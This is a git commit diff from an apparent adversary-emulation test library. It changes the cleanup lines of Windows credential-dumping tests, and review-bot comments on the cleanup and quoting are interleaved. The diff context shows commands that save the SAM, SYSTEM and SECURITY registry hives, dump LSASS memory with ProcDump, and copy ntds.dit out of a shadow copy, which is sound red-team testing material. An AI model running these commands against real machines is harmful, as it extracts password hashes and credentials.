* show executor and privilege requirement

* added an atomic to add c2 domain under trusted zoneMap

* corrected typos

* modified adding a domain by creating one the key is not there

* moved registry modification atomic under T1112

* updated local execution file to be current

* corrected typos

* replaced rm by del for tests with executor as command_prompt

* changing rm to del for command_prompt

* Update T1102.yaml

* Update T1112.yaml

my local repo was behind. This file wasn't changed this time.

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
san-gwea
2020-01-18 23:09:07 -06:00
committed by Keith McCammon
parent 3c40408ad2
commit f2fbeb18ed
+7 -7
@@ -76,9 +76,9 @@ atomic_tests:
reg save HKLM\system "#{output_folder}\system"
reg save HKLM\security "#{output_folder}\security"
cleanup_command: |
rm "#{output_folder}\sam"
rm "#{output_folder}\system"
rm "#{output_folder}\security"
del "#{output_folder}\sam" >nul 2> nul
del "#{output_folder}\system" >nul 2> nul
del "#{output_folder}\security" >nul 2> nul
- name: Dump LSASS.exe Memory using ProcDump
description: |
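Review bot: Sending both stdout and stderr of the three `del` lines to `nul` hides a failed delete, and the files in question are the saved SAM, SYSTEM and SECURITY hives, so a cleanup that silently fails leaves credential material in `#{output_folder}`. A leftover file also affects the next run, because the `reg save` lines in the command above do not pass `/y` and will stop at an overwrite prompt. Consider `del /q /f` so read-only files are removed without prompting, and either keep stderr visible or add `/y` to the `reg save` calls.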
@@ -104,7 +104,7 @@ atomic_tests:
command: |
#{procdump_binary_path} -accepteula -ma lsass.exe #{output_file}
cleanup_command: |
rm "#{output_file}"
del "#{output_file}" >nul 2> nul
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
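Review bot: The cleanup line quotes the path (`del "#{output_file}"`), but the command line passes `#{output_file}` and `#{procdump_binary_path}` unquoted. With a value that contains spaces, ProcDump receives a different argument than the one cleanup tries to delete, and because errors are redirected to `nul` the LSASS dump would stay on disk without any message. Quote both substitutions in the command so the two lines refer to the same file.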
@@ -221,9 +221,9 @@ atomic_tests:
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
cleanup_command: |
rm "#{extract_path}\ntds.dit"
rm "#{extract_path}\VSC_SYSTEM_HIVE"
rm "#{extract_path}\SYSTEM_HIVE"
del "#{extract_path}\ntds.dit" >nul 2> nul
del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul
- name: GPP Passwords (findstr)
description: |
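Review bot: Style point on the three added `del` lines: `>nul 2> nul` mixes spacing and opens `nul` twice; `>nul 2>&1` is the usual command_prompt form and reads more clearly. The same quoting mismatch applies here as well, since the `copy` and `reg save` lines use `#{extract_path}` unquoted while cleanup quotes it. A short comment in the test description stating that cleanup errors are intentionally suppressed would help anyone debugging a run where the hive copies were not removed.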